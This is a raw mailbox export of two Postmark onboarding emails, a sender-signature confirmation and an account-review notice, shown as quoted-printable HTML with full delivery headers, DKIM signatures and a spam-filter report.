mportant } } @media screen and (max-width: 599px) { .follow-banner { padding: 25px 30px = !important } .follow-banner_logo, .follow-banner_links { width: 100%; text-= align: center !important } .follow-banner_logo { margin-bottom: 20px } .fol= low-banner_logo td { text-align: center !important } .follow-banner_links t= d { text-align: center !important } .follow-banner_links span { display: bl= ock } } @media screen and (max-width: 599px) { .post { padding: 15px 30px !importan= t } } @media screen and (max-width: 599px) { .share { padding: 20px 30px !importa= nt } } @media (prefers-color-scheme: dark) { body { background-color: #111111 !imp= ortant } .pm-snippet { background-color: #111111 !important; border-color: = #333333 !important; color: #E6E6E6 !important } .pm-key, .pm-domain { color= : #E6E6E6 !important } .spacer { background-color: #222222 !important; colo= r: transparent !important } .email-wrapper { background-color: #111111 !imp= ortant } .btn { color: #E6E6E6 !important } .btn:visited { color: #E6E6E6 != important } h1 { color: #E6E6E6 !important } h2 { color: #E6E6E6 !important= } h3 { color: #E6E6E6 !important } p { color: #E6E6E6 !important } ul { co= lor: #E6E6E6 !important } ol { color: #E6E6E6 !important } li { color: #E6E= 6E6 !important } .content-block { color: #E6E6E6 !important } .welcome, .co= ntent-block { background-color: #222222 !important } .divider_line { border= -color: #333333 !important } .divider { background-color: #222222 !importan= t } .purchase { border-color: #333333 !important } .purchase td { border-co= lor: #333333 !important } .cta-banner--dmarcdigests { border-top-color: #33= 3333 !important } .cta-banner { background-color: #222222 !important } .foo= ter { background-color: #222222 !important } .footer--outer { background-co= lor: #111111 !important } .footer--slim p { color: #666666 !important } .fo= oter--slim a { color: #666666 !important } .footer--slim a:visited { color:= #666666 !important } .follow-banner { filter: brightness(0.9) !important }= .header--filled { filter: brightness(0.9) !important } .header--digest { b= order-bottom-color: #333333 !important; background-color: #222222 !importan= t } .header--digest .header_logo img { filter: invert(1) !important } .pane= l--warning { border-color: #847450 !important; background: #34311A !importa= nt } .panel--error { border-color: #483737 !important; background-color: #2= E2222 !important } .panel--success { border-color: #3D5332 !important; back= ground-color: #2D302C !important } .panel--info { border-color: #2C3D46 !im= portant; background-color: #131D23 !important } .panel_title { color: #E6E6= E6 !important } .hero { filter: brightness(0.9) !important } } a:visited { color: #007BC8 !important; text-decoration: underline !importan= t } a:visited img { border: none !important } .email-body_inner--other-things .content-block_body a:visited { color: #005= E99 !important } .btn:visited { box-sizing: border-box !important; border-top: 10px solid #0= 07BC8 !important; border-right: 18px solid #007BC8 !important; border-botto= m: 10px solid #007BC8 !important; border-left: 18px solid #007BC8 !importan= t; background-color: #007BC8 !important; font-size: 14px !important; displa= y: inline-block !important; height: auto !important; border-radius: 3px !im= portant; color: #FFFFFF !important; text-align: center !important; text-dec= oration: none !important; -webkit-text-size-adjust: none !important; font-w= eight: bold !important; padding: 5px 10px !important } .btn--ghost:visited { border-top: 10px solid #E6F2FA !important; border-rig= ht: 18px solid #E6F2FA !important; border-bottom: 10px solid #E6F2FA !impor= tant; border-left: 18px solid #E6F2FA !important; background-color: #E6F2FA= !important; font-size: 14px !important; display: inline-block !important; = height: auto !important; border-radius: 3px !important; color: #007BC8 !imp= ortant; text-align: center !important; text-decoration: none !important; -w= ebkit-text-size-adjust: none !important } .testimonial_name a:visited { color: #333333 !important } .testimonial_position a:visited { color: #777777 !important } .footer--slim a:visited { color: rgba(255, 255, 255, 0.5) !important } .footer--outer a:visited { color: #A9A696 !important } .product-ad_link:visited { text-decoration: none !important } .email-prefs a:visited { color: #777777 !important } .postmark .follow-banner a:visited { color: #333333 !important } .post_title a:visited { color: #333333 !important } :root { color-scheme: light dark !important; supported-color-schemes: light= dark !important }</style> <!--[if mso]> <style type=3D"text/css"> .email-wrapper { font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif !import= ant; } p, ul, ol, li, blockquote { line-height: 1.5 !important; } </style> <![endif]--> </head> <body class=3D"postmark" style=3D"height: 100%; margin: 0; background-color= : #EEECE4; color: #333333; line-height: 1.6; -webkit-text-size-adjust: none= ; width: 100% !important;"> <table class=3D"email-wrapper" width=3D"100%" cellpadding=3D"0" cellspaci= ng=3D"0" style=3D"border-collapse: collapse; mso-table-lspace: 0pt; mso-tab= le-rspace: 0pt; -premailer-width: 100%; -premailer-cellpadding: 0; -premail= er-cellspacing: 0; width: 100%; margin: 0; padding: 0; background-color: #F= 5F3EB;"> <tbody><tr> <td align=3D"center" style=3D"font-family: "Helvetica Neue"= , Helvetica, Arial, sans-serif;"> <table class=3D"email-content" width=3D"100%" cellpadding=3D"0" cel= lspacing=3D"0" style=3D"border-collapse: collapse; mso-table-lspace: 0pt; m= so-table-rspace: 0pt; -premailer-width: 100%; -premailer-cellpadding: 0; -p= remailer-cellspacing: 0; width: 100%; margin: 0; padding: 0;"> <tbody><tr> <td class=3D"email-top" width=3D"100%" cellpadding=3D"5" cellsp= acing=3D"0" style=3D"font-family: "Helvetica Neue", Helvetica, Ar= ial, sans-serif; padding: 10px 0;"> <table class=3D"email-top_inner" align=3D"center" width=3D"60= 0" cellpadding=3D"0" cellspacing=3D"0" style=3D"border-collapse: collapse; = mso-table-lspace: 0pt; mso-table-rspace: 0pt;"> <tbody><tr> <td class=3D"email-top_content" style=3D"font-family: &qu= ot;Helvetica Neue", Helvetica, Arial, sans-serif; text-align: center; = font-size: 12px; color: #A9A696;"></td> </tr> </tbody></table> </td> </tr> <tr> <td class=3D"email-body" width=3D"100%" cellpadding=3D"0" cells= pacing=3D"0" style=3D"font-family: "Helvetica Neue", Helvetica, A= rial, sans-serif;"> <table class=3D"email-body_inner" align=3D"center" width=3D"6= 00" cellpadding=3D"0" cellspacing=3D"0" style=3D"border-collapse: collapse;= mso-table-lspace: 0pt; mso-table-rspace: 0pt; background-color: #FFFFFF;"> <tbody><tr> <td class=3D"content-block" style=3D"font-family: "H= elvetica Neue", Helvetica, Arial, sans-serif; padding: 50px; backgroun= d-color: #FFFFFF;"> <h1 class=3D"content-block_title" style=3D"font-family:= "Helvetica Neue", Helvetica, Arial, sans-serif; margin: 0 0 15px= ; color: #333333; font-weight: bold; font-size: 21px; text-align: left;">Hi= Rudolph.Perry =F0=9F=91=8B</h1> <div class=3D"content-block_body"> <p style=3D"font-family: "Helvetica Neue", = Helvetica, Arial, sans-serif; line-height: 24px; text-align: left; margin-t= op: 0; margin-bottom: 25px; color: #333333; font-size: 15px;">Welcome to Po= stmark, new friend! Your username to log in is <strong style=3D"font-family= : "Helvetica Neue", Helvetica, Arial, sans-serif;">Rudolph.Perry<= /strong>.</p> <p style=3D"font-family: "Helvetica Neue", = Helvetica, Arial, sans-serif; line-height: 24px; text-align: left; margin-t= op: 0; margin-bottom: 25px; color: #333333; font-size: 15px;">To get your a= ccount ready for sending, we=E2=80=99ve created a Sender Signature for <str= ong style=3D"font-family: "Helvetica Neue", Helvetica, Arial, san= s-serif;">rudolph.perry@bloomingcostamices.com</strong>. We=E2=80=99ll use = that email address as the =E2=80=9CFrom=E2=80=9D address on the emails you = send. But before we can do that, we need you to confirm that this email bel= ongs to you:</p> <div style=3D"margin-bottom: 25px;"> <a href=3D"https://signatures.postmarkapp.com/confi= rm?token=3D58fc48e4-719b-45e0-a0ce-5204c6c366f6" class=3D"btn" target=3D"_b= lank" style=3D"font-family: "Helvetica Neue", Helvetica, Arial, s= ans-serif; color: #FFFFFF; text-decoration: none; box-sizing: border-box; b= order-top: 10px solid #007BC8; border-right: 18px solid #007BC8; border-bot= tom: 10px solid #007BC8; border-left: 18px solid #007BC8; background-color:= #007BC8; font-size: 14px; display: inline-block; height: auto; border-radi= us: 3px; text-align: center; -webkit-text-size-adjust: none; font-weight: b= old; padding: 5px 10px;">Confirm Sender Signature</a> </div> <p style=3D"font-family: "Helvetica Neue", = Helvetica, Arial, sans-serif; line-height: 24px; text-align: left; margin-t= op: 0; margin-bottom: 0 !important; color: #333333; font-size: 15px;"><stro= ng style=3D"font-family: "Helvetica Neue", Helvetica, Arial, sans= -serif;">Want to use another =E2=80=9CFrom=E2=80=9D name and address to sen= d emails?</strong> No problem! <a href=3D"https://account.postmarkapp.com/s= ignature_domains" target=3D"_blank" style=3D"font-family: "Helvetica N= eue", Helvetica, Arial, sans-serif; color: #007BC8; text-decoration: u= nderline;">Add and verify other Sender Signatures</a> (or remove ones you n= o longer need) at any time in the app.</p> </div> </td> </tr> </tbody></table> <table class=3D"email-body_inner email-body_inner--other-th= ings" align=3D"center" width=3D"600" cellpadding=3D"0" cellspacing=3D"0" st= yle=3D"border-collapse: collapse; mso-table-lspace: 0pt; mso-table-rspace: = 0pt; background-color: #FFDE00; color: #272727 !important;"> <tbody><tr> <td class=3D"content-block" style=3D"font-family: "H= elvetica Neue", Helvetica, Arial, sans-serif; padding: 50px 50px 0; ba= ckground-color: #FFDE00;"> <h1 class=3D"content-block_title" style=3D"font-family:= "Helvetica Neue", Helvetica, Arial, sans-serif; margin: 0 0 15px= ; color: #272727 !important; font-weight: bold; font-size: 21px; text-align= : left;">Other things to know</h1> <div class=3D"content-block_body"> <h2 style=3D"font-family: "Helvetica Neue",= Helvetica, Arial, sans-serif; margin-top: 1.333em; color: #272727 !importa= nt; font-weight: bold; font-size: 18px; text-align: left; margin-bottom: 0.= 666em;"> <img src=3D"https://newsletter.postmarkapp.com/asse= ts/images/icon-test-mode@2x.png" alt=3D"" class=3D"content-block_subtitle-i= con" width=3D"18" height=3D"18" style=3D"margin-right: 2px; margin-bottom: = -2px;"> Test mode and requesting account approval </h2> <p style=3D"font-family: "Helvetica Neue", = Helvetica, Arial, sans-serif; line-height: 24px; text-align: left; margin-t= op: 0; margin-bottom: 25px; color: #272727 !important; font-size: 15px;">Yo= ur account is currently in test mode. That allows you to get familiar with = Postmark, and <strong style=3D"font-family: "Helvetica Neue", Hel= vetica, Arial, sans-serif;">send up to 100 emails to domains that you=E2=80= =99ve verified.</strong> Once you=E2=80=99re ready to send emails to others= , we=E2=80=99ll need to approve your account. Why? Reviewing each account h= elps us tell the <a href=3D"https://postmarkapp.com/support/article/1082-wh= at-types-of-messages-are-a-good-fit-for-postmark?utm_source=3Dpm_onboarding= &utm_medium=3Demail&utm_campaign=3D2110_onboarding" target=3D"_blan= k" style=3D"font-family: "Helvetica Neue", Helvetica, Arial, sans= -serif; color: #005E99; text-decoration: underline;">responsible senders</a= > (that=E2=80=99s you!) apart from the spammers (boo!), so we can maintain = our stellar deliverability rates for all customers. So whenever you=E2=80=99= re ready, <a href=3D"https://account.postmarkapp.com/account_approval/apply= " target=3D"_blank" style=3D"font-family: "Helvetica Neue", Helve= tica, Arial, sans-serif; color: #005E99; text-decoration: underline;">submi= t an approval request</a>.</p> <h2 style=3D"font-family: "Helvetica Neue",= Helvetica, Arial, sans-serif; margin-top: 1.333em; color: #272727 !importa= nt; font-weight: bold; font-size: 18px; text-align: left; margin-bottom: 0.= 666em;"> <img src=3D"https://newsletter.postmarkapp.com/asse= ts/images/icon-get-started@2x.png" alt=3D"" class=3D"content-block_subtitle= -icon" width=3D"18" height=3D"18" style=3D"margin-right: 2px; margin-bottom= : -2px;"> Handy resources to help you get started </h2> <p style=3D"font-family: "Helvetica Neue", = Helvetica, Arial, sans-serif; line-height: 24px; text-align: left; margin-t= op: 0; margin-bottom: 25px; color: #272727 !important; font-size: 15px;">Ch= eck out our easy-to-follow <a href=3D"https://postmarkapp.com/manual?utm_so= urce=3Dpm_onboarding&utm_medium=3Demail&utm_campaign=3D2110_onboard= ing" style=3D"font-family: "Helvetica Neue", Helvetica, Arial, sa= ns-serif; color: #005E99; text-decoration: underline;">getting started guid= es</a> and detailed <a href=3D"https://postmarkapp.com/developer?utm_source= =3Dpm_onboarding&utm_medium=3Demail&utm_campaign=3D2110_onboarding"= style=3D"font-family: "Helvetica Neue", Helvetica, Arial, sans-s= erif; color: #005E99; text-decoration: underline;">developer docs</a> to ge= t set up in Postmark. Still need help? Our Customer Success team is <a href= =3D"https://twitter.com/nckrtl/status/1377714048364597250" style=3D"font-fa= mily: "Helvetica Neue", Helvetica, Arial, sans-serif; color: #005= E99; text-decoration: underline;">pretty</a> <a href=3D"https://twitter.com= /garrettdimon/status/1390489002801782786" style=3D"font-family: "Helve= tica Neue", Helvetica, Arial, sans-serif; color: #005E99; text-decorat= ion: underline;">darn</a> <a href=3D"https://twitter.com/dixpac/status/1390= 587202191699970" style=3D"font-family: "Helvetica Neue", Helvetic= a, Arial, sans-serif; color: #005E99; text-decoration: underline;">great</a= >, so just reply to this message if you have any questions.</p> <p style=3D"font-family: "Helvetica Neue", = Helvetica, Arial, sans-serif; line-height: 24px; text-align: left; margin-t= op: 0; margin-bottom: 0 !important; color: #272727 !important; font-size: 1= 5px;">Happy sending,<br>The Postmark Team</p> </div> <div class=3D"content-block_img-bleed-btm" style=3D"mar= gin-top: 50px; text-align: center;"> <img src=3D"https://newsletter.postmarkapp.com/assets= /images/signup-machine@2x.png" alt=3D"" width=3D"461.5" height=3D"243" styl= e=3D"vertical-align: middle;"> </div> </td> </tr> <tr> <td class=3D"footer footer--slim" style=3D"font-family: &= quot;Helvetica Neue", Helvetica, Arial, sans-serif; padding: 10px 50px= ; background-color: #353942; color: #FFFFFF; border-top: 0;"> <p style=3D"font-family: "Helvetica Neue", He= lvetica, Arial, sans-serif; line-height: 24px; text-align: center; margin: = 0; color: #353942; font-size: 14px;">=F0=9F=92=8C <a href=3D"https://postma= rkapp.com/newsletter" style=3D"font-family: "Helvetica Neue", Hel= vetica, Arial, sans-serif; color: rgba(255, 255, 255, 0.5); text-decoration= : underline;">Subscribe to the Postmark newsletter</a></p> </td> </tr> <tr class=3D"footer footer--outer" style=3D"padding: 0 50px= ; background-color: #F5F3EB; color: #FFFFFF;"> <td style=3D"font-family: "Helvetica Neue", Hel= vetica, Arial, sans-serif; padding: 25px 0;"> <p style=3D"font-family: "Helvetica Neue", He= lvetica, Arial, sans-serif; line-height: 24px; text-align: center; margin: = 0; color: #A9A696; font-size: 14px;"> <a href=3D"https://activecampaign.com" target=3D"_bla= nk" style=3D"font-family: "Helvetica Neue", Helvetica, Arial, san= s-serif; color: #A9A696; text-decoration: underline;">ActiveCampaign LLC</a= >, 1 North Dearborn St, 5th Floor, Chicago, IL 60602 </p> </td> </tr> </tbody></table> </td> </tr> </tbody></table> </td> </tr> </tbody></table> <img src=3D"https://ea.pstmrk.it/open?m=3Dv3_1.ETKaTTl0YUGP6wYfw0SnVg.FUFXc= ZmSQ_gJE5bVQ296qJG5j-0LTXfhgLN9AFS-dzlq3s6Osyhx_fDi87xI050VmFj9ykAg9sompISW= _HnNd9m89XLAI_o3UFroKW3Kx5vTLMIEMf5D8oZEy3HDGGpJPacsgWlRs4U0OE4S0KX_HlDb8zJ= Ul4tmw6rcspcQ2Qc8WOMpnD9of8KuIf6xDDGT855hGX6sqGHOFnferHeET3c8bPmYaviMCvkTMo= hNLb1Ayx1w9cJX2PDir0EW8YACqoTtaEZupTtYlWoUlX5-v6bsbrnlNFdfanEpgVqlaMUvzM05O= 0o2IX8zogrSRYm9yVXB5dzInwcExXGIrKIsTOKBwH252KyghReNp14XS8oUykdDk_RvXoX3HJ6a= ErtF6LKb2_QXCeND6JWnAVJkLLpOFD_yLcwYg2Au6JnVHTp--kFNrVPDSColdifv8x1mUYRrdwd= ibRzHchvWlXcZn7Ji9jiCw2zsOq8F3iAUI1BfQOYJ1F_TmejCQRMi5DI6ZJ6oBmCCzlQPVA72E_= ReFLA-ZS9akYcx5fzZq_-69qI" width=3D"1" height=3D"1" border=3D"0" alt=3D"" /= ></body></html>= --mk3-bc7b03a5e037435f9b915a8211399b76-- PK }��Y5I��N �N A 1727026497.M930127P523957.mgh-web11.maghost.ro,S=20143,W=20745:2,nu ��٘� Return-Path: <pm_bounces@pmbounces.postmarkapp.com> Delivered-To: rudolph.perry@bloomingcostamices.com Received: from mgh-web11.maghost.ro by mgh-web11.maghost.ro with LMTP id EHNQNkFV8Ga1/gcAJwI5NA (envelope-from <pm_bounces@pmbounces.postmarkapp.com>) for <rudolph.perry@bloomingcostamices.com>; Sun, 22 Sep 2024 20:34:57 +0300 Return-path: <pm_bounces@pmbounces.postmarkapp.com> Envelope-to: rudolph.perry@bloomingcostamices.com Delivery-date: Sun, 22 Sep 2024 20:34:57 +0300 Received: from sc-ord-mta116.mtasv.net ([50.31.156.116]:51678) by mgh-web11.maghost.ro with esmtps (TLS1.3) tls TLS_AES_256_GCM_SHA384 (Exim 4.97.1) (envelope-from <pm_bounces@pmbounces.postmarkapp.com>) id 1ssQU3-00000002CKY-2m4m for rudolph.perry@bloomingcostamices.com; Sun, 22 Sep 2024 20:34:57 +0300 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; s=pm20231108; d=pm.mtasv.net; h=From:Date:Subject:To:Message-Id:MIME-Version:Content-Type:Date:From: Message-ID:Reply-To:Sender:Subject:To:CC; t=1727026495; x=1727112895; bh=J+6BsmVAVRc+hjdH+xEN3HZKUc9EAGLfQfjgOtZOTRs=; b=XX7SPCerIxzAgHX4K6rzk+zRMaCoiMuWM/klGhihu3Auf4xHrF1rhEBrUaFb2lxG4JeqTEIHvdx+ Q11vXxq6QNMJVTTWcspvUIoRea1GGhfJ3ktebO6NgJ+vlXX4kprcBr4H6SrGMLMKGXxYJey+Gk18 O1wgri0FqmOb3TWJnNk= Received: by sc-ord-mta116.mtasv.net id hu1ahc3864o8 for <rudolph.perry@bloomingcostamices.com>; Sun, 22 Sep 2024 13:34:13 -0400 (envelope-from <pm_bounces@pmbounces.postmarkapp.com>) X-PM-IP: 50.31.156.116 X-IADB-IP: 50.31.156.116 X-IADB-IP-REVERSE: 116.156.31.50 DKIM-Signature: v=1; a=rsa-sha256; d=postmarkapp.com; s=20240110170422pm; c=relaxed/relaxed; i=support@postmarkapp.com; t=1727026453; x=1727199253; h=date:date:from:from:message-id:reply-to:sender:subject:subject:to:to:cc: feedback-id:mime-version:content-type; bh=J+6BsmVAVRc+hjdH+xEN3HZKUc9EAGLfQfjgOtZOTRs=; b=X4oi4l8zGpaJIlPL9UOOQRaIaQYOISoznlFf1JSA22S77cfFQTB1HUpdRkRuCgncoBJT8mf2Cxm 5YGuVsFLvA8WXGrif5y/P4xRL51f9OaTUvcCk7yZWTYSg44+0oAVuld/nAloQlkXuhw1W+iSOPMZZ qR1rhbo77YJeCoqfr44= From: Postmark <support@postmarkapp.com> Date: Sun, 22 Sep 2024 17:34:13 +0000 Subject: =?utf-8?b?V2XigJlyZQ==?= reviewing your Postmark account To: rudolph.perry@bloomingcostamices.com Message-Id: <66f0551539acf_be720a588ee@ip-172-26-21-92.us-east-2.compute.internal.mail> Feedback-ID: s40483-cGVuZGluZy1hcHByb3ZhbA==:s40483:a50355:postmark X-Complaints-To: abuse@postmarkapp.com X-PM-Message-Id: fda233da-474a-4a84-bb02-a94b33f7c26e X-PM-Tag: pending-approval X-PM-RCPT: |bTB8NTAzNTV8NDA0ODN8cnVkb2xwaC5wZXJyeUBibG9vbWluZ2Nvc3RhbWljZXMuY29t| X-PM-Message-Options: v1;1.4hfBYWmfFygsPKRG-N2O6g.djK6qwfIoKfCcAVUTj5FH_g-K0pgkexBQliKKLNeWBiJL-vuPMSJ4gedkAHkiylFhitIOnaujnkGbd8ljU2ApyLV93JbTHTf_26KC80Ml9KbYzD2X56qmtBADNaFJpGmCnNdYn7AglqHCv1G81EsyZ6s8-NENgzHehb0ZWrq3DJQF8NtyZ0IR55glso_hgof MIME-Version: 1.0 X-PM-MTA-Pool: transactional-1 Content-Type: multipart/alternative; boundary=mk3-9d226e1e85ff436f803b2d506e9fbaf2; charset=UTF-8 X-Spam-Status: No, score=-0.1 X-Spam-Score: 0 X-Spam-Bar: / X-Ham-Report: Spam detection software, running on the system "mgh-web11.maghost.ro", has NOT identified this incoming email as spam. The original message has been attached to this so you can view it or label similar future email. If you have any questions, see root\@localhost for details. Content preview: Hi Rudolph.Perry, Thanks for submitting an account approval request. You can expect to hear from someone on our team within 24 hours. If it’s the weekend, you’ll hear from us on Monday. As a reminder, we review every new live account manually to help us maintain the highest possible reliability and deliverability rates for all of our customers. Content analysis details: (-0.1 points, 5.0 required) pts rule name description ---- ---------------------- -------------------------------------------------- -0.0 SPF_PASS SPF: sender matches SPF record -0.0 SPF_HELO_PASS SPF: HELO matches SPF record -0.1 DKIM_VALID Message has at least one valid DKIM or DK signature 0.1 DKIM_SIGNED Message has a DKIM or DK signature, not necessarily valid -0.1 DKIM_VALID_AU Message has a valid DKIM or DK signature from author's domain 0.0 HTML_MESSAGE BODY: HTML included in message -0.0 DKIMWL_WL_HIGH DKIMwl.org - High trust sender X-Spam-Flag: NO --mk3-9d226e1e85ff436f803b2d506e9fbaf2 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: quoted-printable Hi Rudolph.Perry, Thanks for submitting an account approval request. You can expect to hear f= rom someone on our team within 24 hours. If it=E2=80=99s the weekend, you=E2= =80=99ll hear from us on Monday. As a reminder, we review every new live account manually to help us maintai= n the highest possible reliability and deliverability rates for all of our = customers. Thanks for your patience through the approval process! If you have any ques= tions, feel free to reply to this email. Postmark Team https://postmarkapp.com/support Follow us for the latest updates: http://twitter.com/postmarkapp --mk3-9d226e1e85ff436f803b2d506e9fbaf2 Content-Type: text/html; charset=UTF-8 Content-Transfer-Encoding: quoted-printable <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.= w3.org/TR/html4/loose.dtd"> <html lang=3D"en" style=3D"color-scheme: light dark; supported-color-scheme= s: light dark;"> <head> <meta name=3D"viewport" content=3D"width=3Ddevice-width, initial-scale=3D= 1.0"> <meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3DUTF-8"> <meta name=3D"x-apple-disable-message-reformatting"> <meta name=3D"color-scheme" content=3D"light dark"> <meta name=3D"supported-color-schemes" content=3D"light dark"> =20 =20 <style>.ExternalClass { width: 100%; } .ExternalClass { line-height: 100%; } body { width: 100% !important; height: 100%; margin: 0; background-color: #eeece4;= color: #272727; line-height: 1.6; -webkit-text-size-adjust: none; } a:visited { color: #007bc8; text-decoration: underline; } a:visited img { border: none; } .btn:visited { border-color: #007bc8; border-style: solid; border-width: 10px 18px; backgr= ound-color: #007bc8; font-size: 14px; display: inline-block; height: auto; = border-radius: 3px; color: #fff; font-weight: 700; text-align: center; text= -decoration: none; -webkit-text-size-adjust: none; } .btn:visited--s { border-width: 5px 9px; } .btn--ghost:visited { border-color: #deeef8; border-style: solid; border-width: 10px 18px; backgr= ound-color: #deeef8; font-size: 14px; display: inline-block; height: auto; = border-radius: 3px; color: #007bc8; text-align: center; text-decoration: no= ne; -webkit-text-size-adjust: none; } .footer--slim a:visited { color: #b0aea7; } .follow-banner a:visited { color: #272727; } .digest a:hover { color: #000 !important; } @media screen and (prefers-color-scheme:dark) { body { background-color: #111 !important; } .spacer { background-color: #272727 !important; color: transparent !important; } .txt-warning { color: #fa9552 !important; } .txt-danger { color: #fb9186 !important; } .email-wrapper { background-color: #111 !important; } .btn { color: #ececec !important; } .btn:visited { color: #ececec !important; } h1 { color: #fff !important; } h2 { color: #fff !important; } h3 { color: #fff !important; } li { color: #ececec !important; } ol { color: #ececec !important; } p { color: #ececec !important; } ul { color: #ececec !important; } .one-time-code { color: #fff !important; } .welcome { background-color: #272727 !important; } .divider_line { border-color: #5a5a5a !important; } .divider { background-color: #272727 !important; } .purchase { border-color: #5a5a5a !important; } .purchase td { border-color: #5a5a5a !important; } .cta-banner--dmarcdigests { border-top-color: #5a5a5a !important; } .cta-banner { background-color: #272727 !important; } .footer { background-color: #111 !important; } .footer--slim p { color: #5a5a5a !important; } .footer--slim a { color: #5a5a5a !important; } .footer--slim a:visited { color: #5a5a5a !important; } .follow-banner { filter: brightness(.9) !important; } .header--filled { filter: brightness(.9) !important; } .header--error { background-color: #ffb3aa !important; } .header--digest { border-bottom-color: #5a5a5a !important; background-color: #272727 !imp= ortant; } .header--digest .header_logo img { filter: invert(1) !important; } .panel--warning { border-color: #847450 !important; background: #34311a !important; } .panel--warning .panel_body { color: #ffd6ba !important; } .panel--error { border-color: #483737 !important; background-color: #2e2222 !important; } .panel--success { border-color: #3d5332 !important; background-color: #2d302c !important; } .panel--info { border-color: #2c3d46 !important; background-color: #131d23 !important; } .panel_title { color: #ececec !important; } .digest-server { color: #ececec !important; } .digest-summary { background-color: #272727 !important; } .digest-summary--border { border-top-color: #5a5a5a !important; } .digest-summary_item { border-right-color: #5a5a5a !important; } .digest-section { background-color: #272727 !important; } .digest-key_label .activity-link { color: #ececec !important; } .hero { filter: brightness(.9) !important; } } @media screen and (max-width:599px) { pre { width: 230px; } .email-top { display: none !important; } .email-body_inner { width: 100% !important; } .email-footer { width: 100% !important; } .welcome { padding: 30px 30px 10px !important; } .divider { padding: 20px 30px !important; } .divider_image--desktop { display: none; } .divider_image--mobile { display: block !important; height: auto !important; max-height: none !i= mportant; font-size: 16px !important; } .divider--thick { padding: 20px 0 !important; } .divider--no-padding { padding-top: 0 !important; } .divider--no-pad-bottom { padding-bottom: 0 !important; } .divider--no-padding { padding-bottom: 0 !important; } .content-block { padding: 20px 30px !important; } .content-block--image { padding-top: 0 !important; padding-bottom: 0 !important; } .content-block_image-container { text-align: center; } .content-block_body-container { width: 100%; } .content-block_image-container { width: 100%; } .content-block--small .content-block_title { margin-top: 16px !important; } .cta-banner { padding: 30px; } .cta-banner_logo { text-align: center !important; } .cta-banner_sub-title { text-align: center !important; } .cta-banner_title { text-align: center !important; } .cta-banner_action { width: 100%; } .cta-banner_body { width: 100%; } .cta-banner_action { text-align: center !important; } .cta-banner_action td { text-align: center !important; } .cta-banner--centered .cta-banner_action td { text-align: center; } .footer { padding: 0 30px !important; } .footer_table { width: 100%; } .footer--slim { padding: 16px 30px !important; } .follow-banner { padding: 15px 30px !important; } .follow-banner_links { width: 100%; text-align: center !important; } .follow-banner_logo { width: 100%; text-align: center !important; } .follow-banner_logo { margin-bottom: 20px; } .follow-banner_links td { text-align: center !important; } .follow-banner_logo td { text-align: center !important; } .follow-banner_links span { display: block; } .header--digest .header_logo { padding-top: 0 !important; padding-bottom: 12px; text-align: center !im= portant; } .header_block { width: 100% !important; } .panel--inline .panel_col { width: 100% !important; } .panel--inline .panel_actions .btn { display: block !important; margin-top: 10px; } .digest-server { text-align: center !important; } .digest-date { text-align: center !important; } .digest-summary { padding-right: 30px !important; padding-left: 30px !important; } .digest-summary_item { width: 100% !important; border-right: 0 !important; padding-bottom: 20p= x !important; } .digest-summary_item td { padding-right: 0 !important; padding-bottom: 20px !important; padding-l= eft: 0 !important; } .digest-summary_item:last-child td { padding-bottom: 0 !important; } .digest-section { padding-right: 30px !important; padding-left: 30px !important; } .digest-key_item { width: 100% !important; } .digest-section-header_title { width: 100%; } .digest-section-header_actions { width: 100%; text-align: left !important; } .hero { padding: 10px 30px 0 !important; } } @media only screen and (max-device-width:480px) { body { -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; } } </style> </head> <body class=3D"postmark" style=3D"width: 100% !important; height: 100%; b= ackground-color: #eeece4; color: #272727; line-height: 1.6; -webkit-text-si= ze-adjust: none; margin: 0;"> =20 <table class=3D"email-wrapper" width=3D"100%" cellpadding=3D"0" cellspa= cing=3D"0" style=3D"border-collapse: collapse; mso-table-lspace: 0; mso-tab= le-rspace: 0; -premailer-width: 100%; width: 100%; -premailer-cellpadding: = 0; -premailer-cellspacing: 0; background-color: #eeece4; margin: 0; padding= : 0;"> <tr> <td align=3D"center" style=3D"font-family: Helvetica Neue,Helvetica= ,Arial,sans-serif;"> <table class=3D"email-content" width=3D"100%" cellpadding=3D"0" c= ellspacing=3D"0" style=3D"border-collapse: collapse; mso-table-lspace: 0; m= so-table-rspace: 0; width: 100%; margin: 0; padding: 0;"> <tr> <td class=3D"email-top" width=3D"100%" cellpadding=3D"5" cell= spacing=3D"0" style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-ser= if; padding: 20px 0;"> <table class=3D"email-top_inner" align=3D"center" width=3D"= 600" cellpadding=3D"0" cellspacing=3D"0" style=3D"border-collapse: collapse= ; mso-table-lspace: 0; mso-table-rspace: 0;"> <tr><td class=3D"email-top_content" style=3D"font-family:= Helvetica Neue,Helvetica,Arial,sans-serif; font-size: 12px; color: #b0aea7= ; text-align: center;"></td></tr> </table> </td> </tr> <tr> <td class=3D"email-body" width=3D"100%" cellpadding=3D"0" cel= lspacing=3D"0" style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-se= rif;"> <table class=3D"email-body_inner" align=3D"center" width=3D= "600" cellpadding=3D"0" cellspacing=3D"0" style=3D"border-collapse: collaps= e; mso-table-lspace: 0; mso-table-rspace: 0; width: 600px; background-color= : #fff;"> <tr> <td class=3D"header header--filled" style=3D"font-family: Helvetica Neue,= Helvetica,Arial,sans-serif; background-color: #ffde00; text-align: center; = padding: 30px 0;"> <a href=3D"https://postmarkapp.com" style=3D"font-family: Helvetica Neu= e,Helvetica,Arial,sans-serif; color: #007bc8; text-decoration: underline;"> <img label=3D"Logo" src=3D"https://newsletter.postmarkapp.com/assets/= images/pm_logo@2x.png" width=3D"200" alt=3D"ActiveCampaign Postmark" style=3D= "margin-left: -27px; vertical-align: middle; border-style: none;"> </a> </td> </tr> <tr> <td class=3D"welcome" style=3D"font-family: Helvetica Neue,Helvetica,Aria= l,sans-serif; background-color: #fff; padding: 50px 50px 20px;"> =20 <p class=3D"welcome_greeting" style=3D"font-family: Helvetica Neue,Helvet= ica,Arial,sans-serif; line-height: 22px; text-align: left; margin-top: 0; f= ont-size: 21px; margin-bottom: 25px; color: #404040; font-weight: 700;">Hi = Rudolph.Perry =F0=9F=91=8B</p> <p style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-serif; line-= height: 22px; text-align: left; margin-top: 0; font-size: 14px; margin-bott= om: 25px; color: #404040;">Thanks for 